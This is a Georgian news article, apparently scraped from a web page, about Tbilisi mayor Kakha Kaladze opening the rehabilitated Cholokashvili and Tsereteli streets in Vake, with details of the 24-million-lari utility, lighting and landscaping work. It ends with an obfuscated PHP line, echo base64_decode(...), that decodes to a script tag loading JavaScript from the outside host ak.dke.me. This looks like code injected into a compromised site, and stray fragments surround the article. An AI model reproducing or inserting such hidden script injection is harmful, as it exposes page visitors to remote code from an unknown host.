global distribution
გარე ავეჯი

ვაკის რაიონში ქაქუცა ჩოლოყაშვილისა და გიორგი წერეთლის ქუჩების სრული რეაბილიტაცია განხორციელდა. გზა დღეს დედაქალაქის მერმა და მმართველი პარტიის მერობის კანდიდატმა კახა კალაძემ გახსნა.

პროექტი 13 000 კვ.მ ფართობზე მოიცავდა მიწისქვეშა კომუნიკაციების განახლებას და საგზაო ინფრასტრუქტურის თანამედროვე სტანდარტებით მოწყობას. სამუშაოების საერთო ღირებულება 24 მილიონ ლარს შეადგენს.

დასრულებულ პროექტს თბილისის მერი კახა კალაძე ვიცე-მერ გიორგი ტყემალაძესთან და საკრებულოს თავმჯდომარე ზურაბ აბაშიძესთან ერთად გაეცნო.

„დავასრულეთ კიდევ ერთი მნიშვნელოვანი ინფრასტრუქტურული პროექტი. ჩოლოყაშვილისა და წერეთლის ქუჩების რეაბილიტაციის ფარგლებში განახლდა მიწისქვეშა კომუნიკაციები, მოეწყო ახალი განათება, გამწვანდა ტერიტორია. მინდა მადლობა გადავუხადო ადგილობრივ მოსახლეობას მოთმინებისთვის და იმ კომპანიებს, რომლებიც 24-საათიან რეჟიმში მუშაობდნენ. მსგავსი პროექტები მომავალშიც გაგრძელდება,“ – განაცხადა კალაძემ.

მერიის ინფორმაციით, პროექტის ფარგლებში განახლდა წყალმომარაგების, წყალარინების, სანიაღვრე და გაზმომარაგების ქსელები. ასევე, ელექტროსადენები მიწის ქვეშ განთავსდა, მოეწყო ტროტუარები და დაიგო ასფალტის ახალი საფარი. უსაფრთხოების მიზნით, ვაკის სასაფლაოს მიმდებარედ აშენდა რკინაბეტონის საყრდენი კედელი.

ორივე ქუჩაზე დამონტაჟდა ენერგოეფექტური LED სანათები, 40-მდე მიწისქვეშა ნარჩენშემკრები ურნა, „ჭკვიანი“ შუქნიშნები და საგზაო ნიშნები. ინფრასტრუქტურა ადაპტირდა განსაკუთრებული საჭიროების მქონე პირებისთვის.

გარე სივრცეებში მოეწყო სარწყავი სისტემები, დაირგო 180 ძირი სხვადასხვა სახეობის ნერგი და 2 100 კვ.მ ფართობზე ბალახის საფარი.

განახლებული ქუჩები რეაბილიტირებულ ჭავჭავაძის გამზირსა და წყნეთის გზატკეცილს უერთდება.

148
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");